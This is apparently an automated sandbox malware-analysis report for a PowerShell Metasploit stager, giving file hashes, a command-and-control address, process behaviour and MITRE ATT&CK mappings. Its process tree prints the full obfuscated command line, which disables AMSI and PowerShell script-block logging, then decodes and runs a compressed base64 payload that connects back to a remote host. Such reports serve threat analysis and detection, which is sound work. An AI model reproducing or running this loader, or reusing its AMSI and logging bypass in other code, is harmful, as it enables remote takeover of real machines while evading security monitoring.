metasploit | cc227eb535e8393e6dd1a8fc57fa248846b734a6f4ffeeb597481c0c88b44a99

General

Target

cc227eb535e8393e6dd1a8fc57fa248846b734a6f4ffeeb597481c0c88b44a99.ps1
Size

4KB
MD5

89d65474e7376b3c3f14b7a4bb93aaba
SHA1

3e1a19502e13b2bfd738b235305b42cd773fa22f
SHA256

cc227eb535e8393e6dd1a8fc57fa248846b734a6f4ffeeb597481c0c88b44a99
SHA512

b9a6c4317b665835eec309b5d0122b1a3c8a2a8e761f3091413bc0c44a605f0c928875d3afc5f9b6285a249d3302069594ae46698032e3a2a6a139008e34235d
SSDEEP

96:bByt6YIxXgkzrd4ye6rPk2sfbfxhbNycG4uB+bC7YY:bowXRF4QriLNycSB+b/Y

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

metasploit_stager

C2

192.168.1.128:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2220	powershell.exe
2796	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2220	powershell.exe
2796	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2220 wrote to memory of 2796	2220	powershell.exe	31
PID 2220 wrote to memory of 2796	2220	powershell.exe	31
PID 2220 wrote to memory of 2796	2220	powershell.exe	31

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\cc227eb535e8393e6dd1a8fc57fa248846b734a6f4ffeeb597481c0c88b44a99.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -noni -nop -w hidden -c $huha=(('{5}'+'nabl{'+'3}{2}cri{4}t{0}loc'+'{1}I'+'nvocati'+'onLog'+'gi'+'ng')-f'B','k','S','e','p','E'); $y93BR=(('Sc{0}'+'i{1}t'+'B'+'lock{2'+'}ogging')-f'r','p','L'); $qtW9=(('{2}na{3}l{1'+'}S'+'c{0}'+'ip'+'tBlockLoggin'+'g')-f'r','e','E','b');If($PSVersionTable.PSVersion.Major -ge 3){ $tjHi=[Collections.Generic.Dictionary[string,System.Object]]::new(); $w3=[Ref].Assembly.GetType(((''+'{6}{0'+'}st{9}'+'m.{3'+'}ana{'+'5'+'}{'+'9}m{'+'9}'+'nt'+'.{8}{'+'2}'+'t'+'{7}mat'+'i{7}n.'+'{'+'8}msi{4'+'}t'+'i{1'+'}s'+'')-f'y','l','u','M','U','g','S','o','A','e')); if ($w3) { $w3.GetField((('a'+'{3}s'+'i{4}ni'+'{'+'0'+'}Fai{'+'1}'+'e'+'{2}')-f't','l','d','m','I'),'NonPublic,Static').SetValue($null,$true); }; $sD=[Ref].Assembly.GetType((('S{0}s'+'tem.{4}ana{5'+'}'+'ement.{'+'1}{'+'3'+'}tomation.'+'Uti{2}s')-f'y','A','l','u','M','g')); $pK=$sD.GetField('cachedGroupPolicySettings','NonPublic,Static'); If ($pK) { $eL=$pK.GetValue($null); If($eL[$y93BR]){ $eL[$y93BR][$huha]=0; $eL[$y93BR][$qtW9]=0; } $tjHi.Add($qtW9,0); $tjHi.Add($huha,0); $eL['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\'+$y93BR]=$tjHi; } Else { [Ref].Assembly.GetType((('S{2}stem.'+'Mana'+'{4}'+'emen'+'t.{0}uto'+'mat'+'ion.S'+'cri{5}t'+'{1}{3}ock')-f'A','B','y','l','g','p')).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAFt/5GYCA7VXW4/aOBR+X6n/IaqQCBqGhBk6pSONtA4kEApTMoFwK1qFxCQuzqWJM8B0+9/3OIS5qEy3u1L9Emy'+'fmz9/5xyz'+'zkKHkSg{1}Nrt0KHx784dQjKGd2IEgluI1fV8VSsk{1}VZ42S1H3wztLuBHEB'+'YrjdhTYJFxeX7eyJMEhO8xrHc'+'xQmuJgRQlOxYrwtzDxcYLPP62+YIcJ34TSX7{1}OjVY2LcT2LdvxsXCOQpfv9SPH5qHVzJ'+'gSJpY/fy5XFuf1Z{1}39mtk0FcvmPm{1}4qLm{1}livC9wp3ONrHWCwPiJNEabRmtQkJLy9q'+'4zC11/gWrN3jAWZ+5KZlOM3TeRLMsiQsjsXtHKTEMvwcJpGDXDfBaVquCgvuYbFc/ikuCvd3WchIgGt6'+'yHASxSZO7omD01rXDl2K7/B6CVomS0joLSsVELuPNlgshRmlVeG/mBFv8fYI3q8qic+VQGrIkkoVbvX{1}QQ'+'eRm1F8{1}C2fiDSnQgVGQQdA8DsHcX2k{1}Nz2HeMEh54WjmOR72AIWhxGKcm1bwS5KgzAu82iZA/T0ijJcGX5CLlQYuNW9VeN1Y+aoIebDMHSwoqIu3wy8IICpe20z2Ve53Mbr0mI2/vQDohzpKx46lbwmuIcktpR7BYCFMvFBnbbmGLPZhxmTo4f1NSAsEddJSP{1}xQly4GZTiAouvfIymMPNiW{1}9HOAAwDvMga2lNSQKPkoXybE/eudzECq3qJ2mVWGY'+'QaY6VcHENsVuV{1}BhSootlLEo/1l+CneQ{1}{1}YcO'+'2VHc8vKSzQ'+'Lr60oTFm'+'SOXCrgMDIjLFDbMoBqQpd4mJlbxLv6L18Eo6WTSmkD1i6h+uAFQ6DyThXEgi{1}86JSMzHTg5jiAETyuqFR24Mq{1}eRIzi3bw275dJjHRDiwnsNyxONZkHDXJo1YVbBIwqAIcYg5uf5PDD9WHx5MK8HFzYjH/Fooe8b5X3JuV/6Kc7RAKMcjYYCFlkSBYqf4qnEoNOJbSSXtd8N29IBgqNqdYSmm2e6a8zHpjwPlztSZ2dHmOqnrnonOLs1NrJPLnjEadXsgh5L2zl8jPdXVrrI36gpyu'+'uS91cvliaw3TdQ1DEsLvKk3a231oT/VwVGr7+kefBXddxR5LnuKrJ'+'p9o6{1}YRPZmptE1GvW5LjWpQh5MPfeFuhPuz3C6vba9Az9qo9Gd7kbodtBDvvbJ1eoXmq8SGW24/nzT6bfVfO7wuTFLVaJqM8Py8WQM/rRYmaja3LBi3TvbeobVlxqar0xgTnb92JRg1Ou9+9B9GNDmwwDCNax5j+C57uG9hwyEzFlIzdW2hRTN2X70FE/VxrC2GenhzljFA3c/60ofrAHBcYQMFSGNQo4GyN62pfok+mhY74yxKu/2Y3m'+'3Vb9IW5X0tpviO+5cXXnSujG{1'+'}LFMPu7avQLz7XmNDemewF9iWPFtLFsevtQmlh3BKr3qDHFM4jwE6hONme3egd9BBLNSnkmR5kofW1NK9puFNo/DC3oDtiYcgQjijr5N1Tx84ECslm/HZVKqPIR456O1kHmvQa4K9i80Jm6YP+LpzGyk8DmXSidBk07lq7ZvDAZzDqoPN0MpGky7YhJizTZPDDHfbNlthx9SnF+7qTpHO3'+'JntKfPsDLkfvVghbiLVjZubt8D0xZiE7PJiW{1}ovnOFX3gze/FGK7Gdsf63XDewk9W0KWQA97FiLtCjRirY0jAjXEMX8hbPBSYgpvAng1XDMYkRp5PC2eGhg0JMPnZI37rGeh3XqV0V4FKw8tcvj0vX1HMKEw'+'pBnba2PQ4/5VXl3KcvQ5+Sd3MhrwK+frhXFe/FgrcpbJaDzaJ3m1sEgWQui+PsRgzcRg9r8E8xeg'+'w+cb6CaQnE/1DgOohJF9DmE+ckeCfECPw'+'CuDmdf8PfQgSpg4Rx/hfrLHwvPHx8l3/y97ClKtQ8f91/Z87T2k91fYpRc5fj8sPhy4VmP+40ITGzCQNKEjkPx4Q30ChBFxjy7Y9+EZFgXg/85+JSx81t4auZd7x8S{1'+'}veClwwAAA{0}{0}')-f'=','U')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\34Z32VH7SIBWGTZGWSMH.temp

Filesize
7KB

MD5
91370b22cf53f2ee88deedffcd037590

SHA1
45b75ce219a808dd2c134dacbf391dc215667433

SHA256
0a05d6dd0023744ac92ed7a2234b9426d36540f78447b2c3ed2b5a8755354f74

SHA512
c8a1362048ec348801a5bc2de8a54ed484d54eb34cba72f3787f326148e15db5d9310fc0f429d19e4e7c1f20a50894f1555511f8dcc36f92220888e9b14bd5e7

Download Submit
memory/2220-10-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-5-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-7-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2220-8-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-9-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-4-0x000007FEF478E000-0x000007FEF478F000-memory.dmp

Filesize
4KB

Download
memory/2220-11-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2220-6-0x000000001B390000-0x000000001B672000-memory.dmp

Filesize
2.9MB

Download
memory/2220-13-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-18-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-19-0x000000001B6A0000-0x000000001B6A1000-memory.dmp

Filesize
4KB

Download
memory/2796-20-0x000007FEF44D0000-0x000007FEF4E6D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing